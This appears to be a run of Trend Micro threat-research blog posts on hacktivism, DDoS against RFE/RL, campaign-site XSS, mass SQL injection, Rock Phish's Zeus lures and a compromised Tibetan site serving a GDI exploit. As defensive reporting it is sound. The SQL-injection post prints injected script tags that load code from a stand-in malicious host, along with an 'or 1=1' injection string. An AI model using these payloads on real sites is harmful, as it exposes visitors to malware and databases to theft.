While most of the cyber crime activities that we see being conducted on The Internet are being driven by illicit financial incentives, there also appears to be type of malicious activity being driven by other motivations altogether – “Hacktivism”.

Hacktivism is best explained as a combination of “hacking” and “activism”, traditionally rooted in cultural and/or geopolitical unrest. As Wikipedia defines it, Hacktivism is “…the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft, web site parodies, virtual sit-ins, virtual sabotage, and software development.”

In fact, Hacktivist incidents stretch back over 20 years, but only in the past couple of years have they become more frequent, and more devastatingly malicious.

The most notable incident of regional Hacktivism were the Distributed Denial of Service (DDoS) attacks against government and corporate websites in Estonia in 2007, which actually began a worldwide dialog on the real threat of “Cyber Attacks” and the impact on national infrastructure.

However, the latest victims of Hacktivism appear to be several U.S. websites in Eastern Europe belonging to Radio Free Europe/Radio Liberty. It was reported Monday that “…the attack, which started on April 26, initially targeted the website of RFE/RL’s Belarus Service, but quickly spread to other sites…”

According to a statement on the Radio Free Europe/Radio Liberty website, RFE/RL had been “…hit before by denial-of-service attacks, but this attack was unprecedented in its scale, as RFE/RL websites received up to 50,000 fake hits every second.”

While incidents of Hacktivism are not new, they are beginning to become a lot more frequent — perhaps due to the availability of tools to conduct hacktivist mischief, but also perhaps due to the ubiquitous social networking mechanisms which can now be used as to build consensus when times of cultural or political unrest present the opportunity.

In any event, Hacktivism is becoming a disturbing trend, and one which can have serious ripple effects that interfere with Internet operational continuity — sometimes in ways which we may have not even thought of yet.

“Fergie”, a.k.a. Paul Ferguson
Internet Security Intelligence
Advanced Threats Research

Senators Hillary Clinton and Barack Obama battle it out on all fronts, literally. The tight contest, where until now no clear frontrunner emerges, isn’t likely to be dictated by just the debates. So we see extra-political battles in different arenas. The Web would seem one likely sphere where the one hopeful nominee who dominates gains a lot.

The most recent Internet-related clash between these two involved redirection: one candidate’s Web site leads users to the site of the other. Users viewing Obama’s site were redirected to Clinton’s through an attack called cross-site scripting (XSS). Researchers were successful in reversing the attack, too, exploiting vulnerabilities and revealing these glitches to the site owners.

Internet-related incidents are not new in the coming U.S. presidential elections. TrendLabs, as early as November last year, reported on spamming activities that were seen as campaign materials for Ron Paul. Clinton herself was featured in a spam run that spewed malware into systems, turning them into bots to further spread spam.

This time, however, the cross-site scripting attacks are seen as benign as no malware were involved. With the increasing hype around spamming and other malicious activities, this might be a move driven by caution. Those who do it may have realized that malicious activities, once exposed, will inevitably taint individuals and their appearances to the media, or to everyone in general.

Researchers are still investigating how this type of attack could be used in more malicious criminal activity.

Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.

F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.

The infection code was a <script > tag that pointed to a malicious URL. The new discovery here is that these malicious tags were inserted between the usual text tags <title > </title >. For example
<title >My Website <script src=http://maliciousURL.com > </script > </title >
and into <meta >, <a href= > <div class=”myclass” > etc. like for example <a href=http://goodURL <script src=http://maliciousURL > </script > >.

An infected Web site would display its infection in the browser window title:

While neither <title > nor <meta > tags are supposed to support <script >, some browsers are prone to syntax errors. They interpret any script tags wherever they are placed.
The visitors of the affected Web sites are thus exposed to threats active on their systems.

The massive infection of Web sites was done supposedly through automated SQL injection. This is not the first instance of this type of attack; unfortunately, it would not be the last time either.

What’s notable about SQL injections is that such attacks can be triggered any time, regardless of the security patch of the SQL server behind. The success of the attack depends on the Web application that uses SQL servers. A Web site with no field content control is pretty easy to fool into sending to the server a simple SQL command. To simplify:

“SELECT * FROM bank_data WHERE Userid=blah or 1=1”

The moral of this story is that cyber criminals will have an easy game as long as Web sites are made by construction kit users or from inexperienced developers that may not consider field content checking.

Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.

Our friends from RSA have recently reported about the latest one-two punch employed by the infamous Rock Phish gang (also reported here and here). Best known for their easy-to-use kits that yield professional looking phishing pages, Rock Phish now introduces information-stealing malware — dubbed as the Zeus Trojan.

This attack is reminiscent of the Bank of America phishing attack, which we reported several days ago, wherein users are prompted to install a “digital certificate” in order to access the bank’s online login page. Incidentally, the phishing page was also Rock Phish.

And apparently there were more: Trend Micro Advanced Threats Researcher Paul Ferguson and the TrendLabs Content Security team came across a couple of malicious “certificates” detected as TSPY_PAPRAS.AC and TSPY_PAPRAS.AD. These spyware each target the Comerica and Colonial banks, respectively.

Below are screenshots of the phishing email and Web page targeting Comerica account holders:

Traditional phishing involves phishers sending out email messages that lead users to a fake Web site resembling login pages of certain institutions or companies. This time they’ve made sure they can get sensitive user information even without getting users to log on to some fake page. They do this by planting a spy in users’ systems so any relevant user action can be transmitted to a remote server. Unprotected users thus stand to lose sensitive information.

This recent development even makes it more important to remind users to be wary of clicking links in email communications, and to keep scanning engines up-to-date.

Addtional text by Paul Oliveria

Late last week, Trend Micro Senior Threat Researcher Paul Ferguson reported a Web site compromised by a malicious JavaScript that links users to a known Graphical Device Interface (GDI) exploit.

You may recall that this critical exploit gives the remote user complete control over vulnerable systems once a specially crafted .EMF or .WMF image file is executed. The compromised site is the official Web site of the Tibetan government in exile.

Visitors to that site would unwittingly download an embedded malicious JavaScript:

http://www.tibet.com/{BLOCKED}/tibet.js

A closer look at the script reveals that it refers to the following sites containing iFrame tags pointing to malware files and the GDI exploit:

• http://ad.{BLOCKED}.googlepages.com/ad02.jpg - the GDI/WMF exploit file, which Trend Micro detects as HTML_EXP.AZ
• http://ad.{BLOCKED}.googlepages.com/rm03.html - the obfuscated JS file, which is detected as HTML_EXP.AA
• http://ad.{BLOCKED}.googlepages.com/142.htm - the obfuscated Visual basic (VB) script, which is detected as as VBS_VBSWGBASE.BH

Trend Micro detects the JS file, tibet.js, as HTML_IFRAME.OB.

Obviously, cyber criminals are still finding issues concerning Tibet, China, and the Olympics to be hot. TrendLabs has documented a couple of such occurences here and here.

One may take this as just another case of one party going head-to-head with an opposing party using malware. It is easy to point to hacktivists with political agendas, with the news of Chinese hackers supposedly launching a distributed Denial-of-Service attack surfaced during the weekend. The attack was in protest against a CNN coverage that was deemed “pro-Tibet,” but the said attack never transpired. Anti-CNN.com, a Chinese Web site created solely for the purpose of exposing the Western news company’s “biases,” urged street protests in European countries.

Though no proof was established regarding the connection between the anti-CNN movement and the supposed hacking incident, a team who had been investigating Chinese hackers believed that the online attacks should supposedly go hand-in-hand with the street protests. Think of it as a synchronized protest in the real and digital worlds. CNN has already released a statement regarding their Tibet coverage.

Chinese hackers did, however, manage to disrupt the SportsNetwork Web site, as reported here on TechCrunch.

Keep patches up to date to protect your systems from being exploited. At the same time, Trend Micro implores users to regularly update pattern files for improved system protection. Note that all related malicious Web sites are already blocked by the Content Security Team.